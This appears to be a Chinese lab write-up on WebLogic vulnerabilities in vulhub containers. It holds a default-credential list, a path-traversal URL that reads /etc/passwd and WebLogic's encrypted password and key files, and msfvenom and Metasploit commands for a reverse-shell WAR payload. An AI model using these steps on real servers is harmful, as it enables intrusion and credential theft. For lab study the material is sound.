网安-中间件-weblogic(updating..)

发布于:2025-08-04 ⋅ 阅读:(13) ⋅ 点赞:(0)

目录

Weblogic

CVE数据库-weblogic

解密工具

weblogic漏洞综合利用工具(深信服)

实验

1.弱口令、任意文件读取 

漏洞环境:

weblogic常用弱口令:

漏洞描述:

2.CVE-2018-2894 任意文件上传

漏洞环境:

3.CVE-2014-4210 SSRF

漏洞描述:

漏洞环境:

4.CVE-2020-14882 Console远程代码执行

漏洞环境

利用方式

利用流程

5.CVE-2018-2628 T3协议反序列化

6.CVE-2017-10271 XMLDecoder反序列化

7.CVE-2023-21839 JNDI注入


Weblogic

全名:Oracle WebLogic Server,avaEE服务器,商业产品,适用于大型商业项目
同类产品:IBM WebSphere、Apache Tomcat、Redhat Jboss
常见版本:
WebLogic Server 10.x ——11g
WebLogic Server 12.x ——12c
vulhub靶场——基于WebLogic Server 10.3.6
默认端口:7001

CVE数据库-weblogic

https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id- 14534/Oracle-Weblogic-Server.html
多为反序列化漏洞
参考文章(奇安信CERT)
WebLogic安全研究报告

解密工具

GitHub - TideSec/Decrypt_Weblogic_Password: 搜集了市面上绝大部分weblogic解密方式,整理了7种解密weblogic的方法及响应工具。

weblogic漏洞综合利用工具(深信服)

https://github.com/KimJun1010/WeblogicTool

实验

实验环境

漏洞靶机(CentOS):192.168.6.66
攻击机(Kali):192.168.142.162

docker compose up -d // 拉取、启动
docker compose ps // 查看进程
docker compose stop // 停止

1.弱口令、任意文件读取 

获得密码进后台(密码暴力破解or利用任意文件读取),传马

漏洞环境:

vulhub/weblogic/weakpass

weblogic常用弱口令:

system:password
weblogic:weblogic
admin:secruity
joe:password
mary:password
system:sercurity
wlcsystem: wlcsystem
weblogic:Oracle@123

漏洞描述:

可以读取服务器任意文件。在读取到密钥和密码密文以后,可以AES解密出后台密码。
http://192.168.6.141:7001/hello/file.jsp?path=/etc/passwd

密文绝对路径:

/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat

相对路径:

security/SerializedSystemIni.dat

密钥绝对路径:

/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml

相对路径:

config/config.xml

访问url 自动下载了file.htm ,说明这个接口存在任意文件读取

抓包,保存密文,解密

 ?path=/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat

 ?path=/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml

 得到密码Oracle@123

用kali2021生成马,传马

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.6.128 lport=4444 -f war -o java.war

监听

msfconsole

use exploit/multi/handler

set payload java/meterpreter/reverse_tcp

set LHOST 192.168.6.128

set LPORT 4444

run


网站公告

今日签到

点亮在社区的每一天
去签到